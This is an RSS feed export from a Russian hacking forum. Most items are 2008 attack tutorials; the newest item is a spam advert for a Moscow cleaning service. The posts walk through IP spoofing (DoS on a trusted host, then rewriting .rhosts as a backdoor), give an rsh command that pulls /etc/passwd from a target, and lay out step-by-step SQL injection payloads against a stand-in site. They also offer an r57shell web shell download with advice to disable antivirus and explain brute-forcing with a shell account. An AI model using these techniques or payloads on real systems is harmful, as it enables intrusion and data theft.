<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://xterritory.0pk.me/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>X-territory</title>
		<link>https://xterritory.0pk.me/</link>
		<description>X-territory</description>
		<language>ru-ru</language>
		<lastBuildDate>Sat, 21 Oct 2023 21:34:00 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Услуги клининга Москва и МО</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=13#p13</link>
			<description>&lt;p&gt;Профессиональные услуги клининга: уборка после ремонта, генеральная, поддерживающая, химчистка мягкой мебели, удаление жировых отложений на кухне парогенератором, мытье окон + альпинист и многое другое. Мы также предлагаем ЭКО-чистку детских игрушек, колясок, комнат и различных предметов.&amp;#160; Заказ по тел. +7 915 204 1047 Наш канал: t.me/wwcleaning Москва и Московская область Услуги клининга офиса, квартиры: грязь, пыль, разводы, зеркала, плитка, цемент, краска, светильники, люстры, свч, холодильник, духовка, плита, варочная панель, вытяжка, розетки, выключатели, керамика, смесители, скотч, мусор, шкафы, сантехника, плинтуса, фартук, столешница, стирка, глажка, пятна, загрязнения, диван, кровать &amp;#9989;Уборка квартиры после ремонта &amp;#9989;Уборка после ремонта цена&amp;#160; &amp;#9989;Уборка после ремонта москва&amp;#160; &amp;#9989;Уборка квартиры после ремонта цена&amp;#160; &amp;#9989;Уборка помещений после ремонта&amp;#160; &amp;#9989;Услуги клининга цены&amp;#160; &amp;#9989;Клининг компания услуги&amp;#160; &amp;#9989;Услуги клининга офиса&amp;#160; &amp;#9989;Химчистка мягкой мебели москва&amp;#160; &amp;#9989;Химчистка мягкой мебели +на дому&amp;#160; &amp;#9989;Химчистка мягкой мебели +и ковров&amp;#160; &amp;#9989;Мытье окон +в москве&amp;#160; &amp;#9989;Мытье окон без разводов&amp;#160; &amp;#9989;Клининг компания услуги&amp;#160; &amp;#9989;ЭКО чистка детских кресел&amp;#160; &amp;#9989;Экологическая очистка детских комнат&amp;#160; &amp;#9989;Услуги клининга квартир&amp;#160; Заказ по тел. +7 915 204 1047 Наш канал: &lt;a href=&quot;https://t.me/wwcleaning&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://t.me/wwcleaning&lt;/a&gt;&amp;#160; &amp;#160;Вотсап: &lt;a href=&quot;https://wa.me/79152041047&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://wa.me/79152041047&lt;/a&gt;&amp;#160; Перейти: &lt;a href=&quot;https://is.gd/tDRpVO&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://is.gd/tDRpVO&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (toaegytvkq)</author>
			<pubDate>Sat, 21 Oct 2023 21:34:00 +0300</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=13#p13</guid>
		</item>
		<item>
			<title>Флудильня</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=12#p12</link>
			<description>&lt;p&gt;Общаемся на разные темы&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stre@m)</author>
			<pubDate>Wed, 08 Oct 2008 16:51:22 +0400</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=12#p12</guid>
		</item>
		<item>
			<title>Взлом сайтов на бесплатном хостинге</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=11#p11</link>
			<description>&lt;p&gt;Спуффинг - это ничто иное, как подделывание исходного IP адреса. Хотя мне очень понравилось толкование спуффинга в одном из толковых словарей &lt;a href=&quot;http://www.globalsystem.ru/slovar.php/a4539.html.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.globalsystem.ru/slovar.php/a4539.html.&lt;/a&gt; Спуффинг заключается в использовании одной машины, чтобы исполнить роль другой. Чтобы понимать, как это происходит вы должны немного знать об установлении подлинности.&lt;/p&gt;
						&lt;p&gt;Каждый пользователь сталкивался с некоторой формой установления подлинности. Типичный пример этому соединение с сетью. Эта сеть может быть расположена в доме пользователя, его офисе, или как в данном случае Интернет. Большая часть распознавания известная обычному пользователю происходит на прикладном уровне. То есть установление подлинности полностью видны пользователю. Типичный пример этому то, когда пользователь сопоставлен с паролем на FTP или Telnet. Пользователь входит под своим логином и паролем; они заверены, и пользователь получает доступ к ресурсу.&lt;/p&gt;
						&lt;p&gt;В Интернет установление подлинности редко происходит на прикладном уровне. В Интернет каждую секунду происходит, какое либо распознавание, которое является невидимым для пользователя. Различие между этого рода распознавания и распознавания на прикладном уровне фундаментально. Установление подлинности на прикладном уровне происходит приблизительно так: Сервер бросает вызов пользователю и затем просит пользователя идентифицировать себя. Но чаще встречающееся распознавание выглядит чуть-чуть сложнее, здесь уже Сервер требует некоторую форму идентификации от пользователя и пока эта идентификация не проверена и не утверждена никакого обмена данными с Сервером не происходит. Такого рода диалоги &amp;quot;Клиент-сервер&amp;quot; всегда происходят автоматически (т.е. без человеческого вмешательства). При помощи спуффинга хакер пытается капитализировать автоматизацию диалога между машинами. Таким образом, Спуффинг атака - экстраординарный метод получения доступа, потому что при этом, хакер никогда не использует логин или пароль.&lt;/p&gt;
						&lt;p&gt;Кто поддается спуффингу.&lt;/p&gt;
						&lt;p&gt;Спуффинг нападение уникально в том, что может быть осуществлено против некоторого класса машин работающих с TCP/IP. К этим машинам я могу отнести некоторые версии UNIX (очень мало машин, которые легко поддаются спуффингу). Машины, работающие под DOS, Windows и Windows 95 не включены в эту группу. Спуффингу не поддаются Macintosh работающие на MacOS. Теоретически возможно, что Macs, работающий на A/UX, а также Linux могут быть подвержены такого рада атакам, но только при хорошем стечении обстоятельств. Думаю, что позже будут найдено большое количество сервисов подверженных Спуффинг атакам, но пока этот список не очень велик:&lt;/p&gt;
						&lt;p&gt;· Любая конфигурация использующая Sun RPC запросы&lt;br /&gt;· Любая служба сети, использующая установление подлинности IP&lt;br /&gt;· R services&lt;/p&gt;
						&lt;p&gt;Sun RPC относится к стандарту Sun Microsystems standard of Remote Procedure Calls, которые являются методами выходящих запросов системы, которые работают прозрачно по сетям (то есть выполнения команд по отдаленным машинам или сетям).&lt;/p&gt;
						&lt;p&gt;Уязвимость R services.&lt;/p&gt;
						&lt;p&gt;R services - rlogin и rsh, распространены в среде UNIX. Эти две программы предназначены для удаленного доступа на другие машины в Интернет. Они чем-то напоминают Telnet.&lt;/p&gt;
						&lt;p&gt;Эти программы посвойму уникальны:&lt;br /&gt;· Rlogin предназначена, чтобы удаленно логиниться на другую машину. Сегодня, rlogin в основном используется в локальных сетях, и только некоторые сервера поддерживают rlogin для удаленного администрирования т.к. rlogin посчитали проблемой безопасности.&lt;/p&gt;
						&lt;p&gt;· Rsh позволяет Вам получить полный доступ к удаленной машине, и вы можете выполнять на ней любые команды. Например, вы можете получить файл пароля, используя команду: rsh our_target.com cat /etc/passwd &amp;gt;&amp;gt; our_target.com_passwd. rsh. поскольку эта функция является огромной дырой в системе безопасности, она обычно отключается. Но все же существуют сервера, на которых админы полные лохи и эта функция все же остается включенной J.&lt;/p&gt;
						&lt;p&gt;Из всего этого можно сделать вывод, что R services легко поддаются IP спуффингу.&lt;/p&gt;
						&lt;p&gt;Как работает спуффинг&lt;/p&gt;
						&lt;p&gt;Спуффинг отличается от обычного сканирования и использования системных дыр. Спуффинг используется уже тогда, когда определенная машина просканирована и уже точно известно, что она может быть подвержена спуффингу.&lt;/p&gt;
						&lt;p&gt;Трастовые отношения и Спуффинг вообще&lt;/p&gt;
						&lt;p&gt;Почти все формы спуффинга полагаются на трастовые отношения в пределах атакуемой сети. Под трастовыми отношениями я не подразумеваю человеческое доверие, к этому роду доверия я отношу доверие между компьютерами.&lt;/p&gt;
						&lt;p&gt;Существует такое понятие как спуффинг хардварного адреса (Hardware address spoofing). Такой тип спуффинга не относятся к сетевым картам, которые не используют софт для назначения адреса. Старые карты поддерживают изменение адреса через программное обеспечение, обычно с установкой джампера (jumper). Хороший пример этому старенькая карта Western Digital Ethernet. На более новых картах спуффинг адреса карты более чем вероятен, хотя стоит принимать во внимание, что IRQ может все еще устанавливаться при помощи джампера.&lt;/p&gt;
						&lt;p&gt;Этот тип спуффинга работает, потому что каждая машина на данном сегменте сети доверяет ее приятелям на этом же сегменте. Машины в пределах сегмента сети, которые знают адреса их приятелей, упомянуты как машины, которые доверяют друг другу. Когда такие трастовые отношения существуют, эти машины могут отдаленно выполнять команды друг для друга без большего количества установления подлинности, требуется только лишь идентифицировать исходный адрес.&lt;/p&gt;
						&lt;p&gt;Анатомия Спуффинга&lt;/p&gt;
						&lt;p&gt;Давайте начнем наш анализ после того, как хакер определил уровни доверия в пределах сети. Краткий обзор сегмента нашей ложной атакуемой сети, называемой Nexus.&lt;br /&gt;Этот сегмент имеет два трастовых отношения:&lt;br /&gt;Nexus 1 и Nexus 2, и Nexus 2 и Nexus 3.&lt;br /&gt;Чтобы получить доступ Nexus у хакера есть два варианта:&lt;br /&gt;Он может обмануть или Nexus 1 или Nexus 3, представив себя как Nexus 2&lt;br /&gt;Он может обмануть Nexus 2, представив себя как Nexus 1 или Nexus 3&lt;br /&gt;К примеру, хакер решает обмануть Nexus 2, представив себя как Nexus 3. Таким образом, его первая задача состоит в том, чтобы напасть на Nexus 3 и временно вывести ее из строя.&lt;/p&gt;
						&lt;p&gt;Шаг первый: Вывести из строя Nexus 3 Думаю здесь много писать не стоит ……. Можно использовать DoS&lt;/p&gt;
						&lt;p&gt;Шаг второй: Обнаружение Nexus 2&lt;/p&gt;
						&lt;p&gt;Этот шаг процесса довольно прост. Хакер посылает ряд запросов на Nexus 2, который отвечает рядом пакетов, указывающих получение запросов связи Хакера. Содержание этих пакетов ключ к spoofing технике.&lt;/p&gt;
						&lt;p&gt;Шаг третий: Управление&lt;/p&gt;
						&lt;p&gt;Получив образец, хакер делает другой запрос Nexus 2, требуя пустить его от Nexus 3. Nexus 2 отвечает Nexus 3. Однако, потому что Nexus 3 временно выведен из строя, он не отвечает. Вместо этого, идут ответы хакера.&lt;/p&gt;
						&lt;p&gt;Это наиболее трудная часть атаки. Здесь, хакер должен предположить (основанный на его наблюдениях схемы последовательности) какой номер последовательности Nexus 2 ожидает. Но в то время как идет обмен данными, он не может видеть номера последовательности, отправляемые Nexus 2. Поэтому, хакер должен послать его запросы в слепую.&lt;/p&gt;
						&lt;p&gt;Если хакер правильно предполагает номер последовательности, связь установлена между Nexus 2 и машиной хакера. Для всех целей, Nexus 2 теперь полагает, что хакер является Nexus 3.&lt;/p&gt;
						&lt;p&gt;Шаг четвертый: Открытый доступ хакера в эту сеть&lt;/p&gt;
						&lt;p&gt;Хакер должен создать более подходящую дыру, чтобы чтобы всегда проникать в сеть и не прибегать больше к спуффингу. Самый легкий способ заключается в том, чтобы переписать .rhosts файл так, чтобы Nexus 2 принял связи с любого IP и не требовал дополнительное установление подлинности.&lt;/p&gt;
						&lt;p&gt;Заключение&lt;/p&gt;
						&lt;p&gt;Спуффинг атаки случаются очень редко, но все же случаются. Все это из-за того что хакеру проводящему спуффинг атаку требуются специфические инструменты и навыки. Но будем надеяться что будет появляться все больше и больше людей разбирающихся в этой области&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stre@m)</author>
			<pubDate>Wed, 08 Oct 2008 16:44:40 +0400</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=11#p11</guid>
		</item>
		<item>
			<title>Пошаговое руководство по SQL Injection для новичков</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=10#p10</link>
			<description>&lt;p&gt;Перед вами пошаговое руководство по SQL Injection для новичков. Здесь я попытаюсь очень просто объяснить как украсть нужную нам информацию. &lt;/p&gt;
						&lt;p&gt;Эта статья&amp;#160; является как бы итогом множества других статей, вопросов, ответов, практики итд итп. Написал я эту статью чтобы хоть как то облегчить труды новичков в нашем нелегком деле. &lt;br /&gt;Итак, начнем. &lt;br /&gt;---------------------- &lt;br /&gt;ОБНАРУЖЕНИЕ &lt;br /&gt;---------------------- &lt;br /&gt;Предположим у нас есть цель взломать тот или иной сайт. Иными словами у нас есть жертва. Пусть это будет &lt;a href=&quot;http://www.victim.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com&lt;/a&gt;. Как узнать можно ли провести SQL Injection? Чтобы провести иньекцию надо сначала найти скрипт в котором есть нефильтруемая переменая. Предроложим на сайте есть скрипт news.php через который выводятся, например новости. Предположим у нас есть ссылка на &amp;quot;Новость #1&amp;quot;, и ссылка эта такого вида: &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1.&lt;/a&gt; &lt;br /&gt;Есть также ссылка на &amp;quot;Новость #2&amp;quot; имеющяя сылку вида: &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=2.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=2.&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Признак возможности провести по SQL Injection номер 1: &lt;br /&gt;В адресной строке вместо этого адреса &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1&lt;/a&gt; &lt;br /&gt;вот этот &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1&#039;.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1&#039;.&lt;/a&gt; &lt;br /&gt;Если на экран&amp;#160; выводится сообщение об ошибке такого: &lt;br /&gt;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;&#039; ORDER BY ndate DESC LIMIT 0, 5&#039; at line 1 &lt;br /&gt;или такого вида*: &lt;br /&gt;Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/lol/data/www/www.victim.com/news/news.php on line 569 &lt;br /&gt;то SQL Injection возможна.&lt;/p&gt;
						&lt;p&gt;Признак возможности провести по SQL Injection номер 2: &lt;br /&gt;Если содержимое &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1&lt;/a&gt; &lt;br /&gt;то же что и у &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=2-1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=2-1&lt;/a&gt; &lt;br /&gt;то SQL Injection возможна.&lt;/p&gt;
						&lt;p&gt;Из всего этого понятно что нефильтруемая переменая id и именно ей мы будем присваивать наши запросы.&lt;/p&gt;
						&lt;p&gt;--------- &lt;br /&gt;ПОЛЯ &lt;br /&gt;--------- &lt;br /&gt;Для начала мы должны узнать количество полей в таблице и узнать значение какого поля высвечивается, чтобы потом через это поля выудить информацию. &lt;br /&gt;Сделать это можно двумя способами. &lt;br /&gt;Способ первый: &lt;br /&gt;Банально перебирая количество полей, пока сообщение об ошибке не исчезнет. Пример: &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+union+select+1,2,3,4/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+uni &amp;#8230; +1,2,3,4/*&lt;/a&gt; и так далее.&lt;/p&gt;
						&lt;p&gt;Способ второй: &lt;br /&gt;С помощью оператора ORDER BY, который формирует порядок сортировки полей по номеру (и не только), поля, т.е если выражение: &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+order+by+5/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+order+by+5/*&lt;/a&gt; &lt;br /&gt;не выдаст ошибку - это значит что в запросе используется как минимум 5 полей. Ввожу еще одно выражение: &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+order+by+13/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+order+by+13/*&lt;/a&gt; &lt;br /&gt;Это выражение выполнится с ошибкой, т.к. 13 -го поля не существует и теперь нам известно что полей в выражении не меньше 5 и не больше 12. Выбираю любое число из этого диапазона (примерно среднее): &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+order+by+8/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+order+by+8/*&lt;/a&gt; &lt;br /&gt;Ошибки нет, а это значит что количество полей находится в диапазоне от 8 до 12, Еще раз: &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+order+by+10/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+order+by+10/*&lt;/a&gt; &lt;br /&gt;Ошибка!. т.е количество полей или 8 или 9, остается только попробывать: &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+order+by+9/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+order+by+9/*&lt;/a&gt; &lt;br /&gt;Ошибки нет. Т.о. мы узнали что количество полей равно 9. &lt;br /&gt;Получаем определенную информацию. &lt;br /&gt;Т.к. мы знаем что у нас 9 полей мы можем составить работающее выражение: &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9/*.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+uni &amp;#8230; 6,7,8,9/*.&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Итак, мы узнали количество полей. Их 9. Предположим что высвечивается значения 1, 2 и 3 поля.&lt;/p&gt;
						&lt;p&gt;----------- &lt;br /&gt;ИМЕНА &lt;br /&gt;----------- &lt;br /&gt;Чтобы вытянуть информацию нужно сначала узнать имена таблиц и полей. &lt;br /&gt;Ну чтож, начнем. &lt;br /&gt;Есть такая замечательная БД INFORMATION_SCHEMA и в ней есть замечательная таблица TABLES и в ней есть замечательные поля TABLE_SCHEMA и TABLE_NAME. Вот с их помощю мы и узнаем имена таблиц. Вот запрос: &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+union+select+table_schema,table_name,3,4,5,6,7,8,9+from+information_schema.tables.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+uni &amp;#8230; ma.tables.&lt;/a&gt; &lt;br /&gt;Теперь в нашем броузере отобрязятся все таблицы Базы Данных. &lt;br /&gt;Остается узнать имена полей. Для этого набираем в адресной строке &lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+union+select+1,column_name,3,4,5,6,7,8,9+from+information_schema.columns.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+uni &amp;#8230; a.columns.&lt;/a&gt; &lt;br /&gt;Как можно увидеть мы поставляем имена полей вместой той цифры которая отображается на экране. &lt;br /&gt;----------- &lt;br /&gt;ПОСЛЕСЛОВИЕ &lt;br /&gt;----------- &lt;br /&gt;Также хотелось бы вам рассказать о двух вещях. &lt;br /&gt;Первое:оператор LIMIT. &lt;br /&gt;Если все проходит не так гладко как хотелось бы то в самом конце запроса мы добавляем LIMIT a,b что означает показать b записей начиная от а. &lt;br /&gt;Второе:Коментарий /*. &lt;br /&gt;Если и лимит не помог то попробуйте в самом конце запроса поставить символ комментария. Если ставим знак коментария то остальная часть запроса отбрасывается. &lt;br /&gt;Вот собственно и все&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stre@m)</author>
			<pubDate>Wed, 08 Oct 2008 16:41:45 +0400</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=10#p10</guid>
		</item>
		<item>
			<title>r57shell</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=9#p9</link>
			<description>&lt;p&gt;популярный php шелл.&lt;br /&gt;&lt;a href=&quot;http://letitbit.net/download/185f03850511/r57shell.php.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;br /&gt;Во время скачивания и использования вырубите антивирь(если есть)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stre@m)</author>
			<pubDate>Wed, 08 Oct 2008 10:42:39 +0400</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=9#p9</guid>
		</item>
		<item>
			<title>Шеллы... Что это такое и с чем их едят...</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=8#p8</link>
			<description>&lt;p&gt;Статья довольно старая, но актуальная..&lt;br /&gt;Введение&lt;br /&gt;У шелла может быть множество разных применений, начиная с удобной работы с файлами на сервере (в случае если шелл был предоставлен хостером) и заканчивая разнообразными взломами через этот шелл. Большинство служб (если их можно так назвать, предоставляющих шелл, вместе с ним дают место под сайт. Конечно, его не очень много (хотя всё зависит от конкретного сервера), но зато там разрешают использовать perl, etc, чем может похвастаться не любой бесплатный хостинг…. гм, что-то я увлекся %). Так вот, шелл может оказаться весьма полезной фичей. Почему? Во-первых, канал. На уважающем себя хостинге канал должен быть широкий. Во-вторых, железо. Пень 166 для хостинга не пойдёт %). Следовательно, можно запускать задачи наподобие john (что это такое чуть ниже), требующие мощного проца. Да и вообще, шелл нужен! =)&lt;/p&gt;
						&lt;p&gt;Получаем шелл-аккаунт&lt;br /&gt;Возникает закономерный вопрос: где же получить бесплатный shell-аккаунт? Идём на Ссылки только для зарегистрированных пользователей. и пишем в строке поиска: «UNIX + SHELL + FREE». Нам выдаётся куча ссылок по запросу. Можно, конечно, сидеть, копаться, искать наиболее подходящий для вас шелл, но если делать этого особо не хочется, то вот вам ссылка на наиболее симпатичный мне сайт, где можно получить шелл: Ссылки только для зарегистрированных пользователей.. К тому же, сервер находится недалеко от Бельгии, что подразумевает достаточно высокую скорость передачи между вами и сервером. Регистрируемся на этом сайте (поля заполнять на буржуйском, e-mail писать ваш, а не чужой). В поле «Give a short description of what will be done with your account:» напишите что-нибудь типа «I want create a cool homepage», ну или что-то в этом роде (про хак ничего не писать!%)). На мыло приходит письмо от rootshell.be Support support@rootshell.be с вашим логином, автоматически сгенерированным паролем, хостом, к которому нужно подключаться, и прочей чушью. Если позже захочешь сменить пасс, иди на Ссылки только для зарегистрированных пользователей., в поле «Login» пиши свой логин, и на твоё мыло придёт новый пароль. Ну всё, зарегались… что делать дальше? Обычно шеллы бывают с доступом по telnet (23 порт) и SSH (22 порт). Если ваш шелл использует первое, тогда для соединения с ним сойдёт виндовая утилита telnet. Находится она в %Директория_с_Виндой%/System32/telnet.exe, ну или Пуск-&amp;gt;Выполнить-&amp;gt;telnet. Далее расписывать использование telnet не буду, т.к. служба, рассматриваемая мной, использует SSH2. Скажу лишь, что по телнету есть небольшой help в %Директория_с_Виндой%/Help/telnet.chm с командами самой программы, а для управления шеллом используются всё те же команды, что и для SSH. В нашем случае всё немного сложнее, т.к. винда не имеет встроенного SSH-клиента. В инете есть много подходящих софтин, но мне больше нравится Putty (кстати, он поддерживает и telnet). Качаем его, например, отсюда. Запускаем Putty.exe и изменяем опции соединения по своему вкусу (ну или по вкусу шелла . Напомню, что я расписываю работу с rootshell.be, для других служб настройки будут выглядеть несколько иначе. Во вкладке Session в Host Name пишем «phenix.rootshell.be» и нажимаем SSH. Port должен был смениться на 22. Идём на вкладку Connection-&amp;gt;SSH. Preferred SSH protocol version ставим SSH2 only. На вкладке Session сохраняем наши настройки под новым именем и нажимаем Open. Открылось чёрное окно, где нас просят ввести логин. Что ж, вводим%). Далее нужно ввести пароль. Смотрим письмо, пришедшее нам от rootshell.be, и оттуда вводим пароль (обязательно соблюдайте регистр!). Если всё сделано правильно, то через пару секунд ты попадёшь на свой шелл. Если же этого не произошло, попробуй ещё раз, вдруг ты что-то неправильно сделал… Можно пробежаться по тексту, любезно выведенному для нас, там обычно пишут последние новости, связанные с работой сервера. Всё, мы на шелле…&lt;/p&gt;
						&lt;p&gt;Работа с шеллом&lt;br /&gt;Что теперь делать? Да всё то же, что ты делаешь на своём компе, только немного в другой, непривычной форме. Если ты работал в ОС Linux/FreeBSD/OpenBSD/etc, то особых проблем возникнуть не должно… Если же нет, то для начала я бы посоветывал прочитать какую-нибудь книгу по Linux, пусть небольшую, но всё же… В этой статье я не могу описать даже одну милионную часть работы с этой операционкой. Ну ладно, чтобы не грузить тебя, дам пока кое-какие команды, часто используемые «хакерами» на шелле %):&lt;br /&gt;at - указание времени когда выполняется команда&lt;br /&gt;chown - смена хозяина файла&lt;br /&gt;batch - выполнить команду во время загрузки&lt;br /&gt;telnet - клиент телнет&lt;br /&gt;ftp - клиент фтп&lt;br /&gt;rmdir - удалить каталог&lt;br /&gt;finger/who/users - вывести список работающих в системе.&lt;br /&gt;gcc - компилятор C&lt;br /&gt;ftpwho - фингер для фтп&lt;br /&gt;mv - переместить файл&lt;br /&gt;kill - прекратить процесс&lt;br /&gt;cat - текстовой редактор&lt;br /&gt;ls - просмотр каталога&lt;br /&gt;chmod - смена привилегий файлового доступа&lt;br /&gt;rm - удалить файл&lt;br /&gt;id - просмотр прав, т.е.uid и gid&lt;br /&gt;mail - работа с мылом&lt;br /&gt;cd - сменить каталог&lt;br /&gt;cron - демон команд at и batch&lt;br /&gt;logname - получение имени регистрации&lt;br /&gt;cp - копирование чего либо.&lt;br /&gt;uname -a - всё о версии системы.&lt;br /&gt;crontab - задать резервы времени между запусками прог.&lt;br /&gt;ps - ознакомление со списком процессов.&lt;br /&gt;pwcheck - просмотр дефолтового файла пароля.&lt;br /&gt;umask - маска для определённого файла.&lt;br /&gt;su - программа su&lt;br /&gt;sleep - преостановить процесс.&lt;br /&gt;passwd - работа с паролем.&lt;br /&gt;news - отображение usenet&lt;br /&gt;write - мессага текущему юзеру.&lt;br /&gt;uux - выполнить комманды на remote компе&lt;br /&gt;nslookup - сводки гидромедцентра о IP&lt;br /&gt;uucp - копирование файл с/на remote комп&lt;br /&gt;uuname - список хостов UUCP&lt;br /&gt;more - вывод текстовика в постраничном режиме&lt;br /&gt;greg - поиск строки в фйле по заданному ключу&lt;br /&gt;greg -i - то же,без учёта регистра.&lt;br /&gt;uuencode - содание текстовой версии двоичного файла( для мыла)&lt;br /&gt;uudecode – создание двоичной версии текстового файла&lt;br /&gt;tar - создание архивов файлов.&lt;br /&gt;uncompress - получение исходного из сжатого файла.&lt;br /&gt;uptime – время запуска машины.&lt;br /&gt;ping - %) читай man.&lt;/p&gt;
						&lt;p&gt;Принцип ввода и выполнения команд имеет постоянную схему: команда, ключи, параметры. Например, для просмотра директории командной ls с ключом –la, нужно ввести «ls –la». По большинству команд есть т.н. help, в котором описывается синтаксис вызова команды, ключи, etc. Для вызова вызова help’а по команде ls нужно ввести «ls --help». Так же у многих программ имеется неплохое справочное руководство, которое вызывается следующим образом: man команда. Например, для команды ls его можно получить так «man ls». Дальше расписывать работу с *nix-системами не буду, т.к. всё это есть в любой книге по ним.&lt;/p&gt;
						&lt;p&gt;Принцип ввода и выполнения команд имеет постоянную схему: команда, ключи, параметры. Например, для просмотра директории командной ls с ключом –la, нужно ввести «ls –la». По большинству команд есть т.н. help, в котором описывается синтаксис вызова команды, ключи, etc. Для вызова вызова help’а по команде ls нужно ввести «ls --help». Так же у многих программ имеется неплохое справочное руководство, которое вызывается следующим образом: man команда. Например, для команды ls его можно получить так «man ls». Дальше расписывать работу с *nix-системами не буду, т.к. всё это есть в любой книге по ним.&lt;/p&gt;
						&lt;p&gt;Работа с брутфорсом&lt;br /&gt;Теперь перейдём непосредственно к практике. По многочисленным просьбам трудящихся опишу работу с брутфорсом. Под Linux существует много разных брутфорсов: и для аси, и для мыла, и для Ссылки только для зарегистрированных пользователей. и для etc. Наиболее распространенным брутфорсом под *nix является John The Ripper. У него достаточно много функций, написан он на Си… Но его надо устанавливать, чего я не люблю%). Если кому-то интересно, то качайте john’a отсюда. Чтобы распаковать его используйте программу tar с нужными параметрами, например, «tar zxvf john-1.6.tar.gz». Чтобы узнать о этой команде всё, юзай «man tar».&lt;br /&gt;Ах, да, чуть не забыл сказать, как закачать на шелл нужную программу. Для этого есть удобная утилита wget. Для её использования достаточно ввести: wget ссылка_на_файл. В нашем случае это будет «wget Ссылки только для зарегистрированных пользователей.». Кстати, wget умеет закачивать целые сайты… После распаковки заходим в каталог с программой: «cd john-1.6.tar.gz». Если не охота лазить по дирам набивая команды, можно запустить файловый менеджер: «mc». В нём, я думаю, ты и сам разберёшься. Читаем readme, install, etc. После этого особых вопросов в установке и использовании программы возникнуть не должно. Если же они будут, спрашивайте здесь… по возможности ответим%). Сейчас же мы будем юзать перловский брутфорс. Чем он удобен? Его не надо устанавливать! Брутфорсов, написанных на перле, много… используй поисковые службы. Обычно, каждый из них выполняет только определённую функцию, например, только брутит мыло, или только асю, но бывают и исключения. Допустим, ты закачал на шелл какой-нибудь брутфорс, написанный на перле. Как его запустить? Обычно программа на перле – это файл с расширением .pl. Заходи в каталог со скриптом и набивай там команду «perl название.pl». Если же ты хочешь, чтобы программа работала в background’е (это относится не только к брутам, но и к остальным программам), то напиши в конце команды символ &amp;amp;. Например, «perl название.pl &amp;amp;». Для примера, я покажу вам, как использовать перловый брутфорс для запароленных директорий на Ссылки только для зарегистрированных пользователей. написанный Forb’ом. В этом случае имя пользователя должно быть известно.&lt;/p&gt;
						&lt;p&gt;#!/usr/bin/perl&lt;/p&gt;
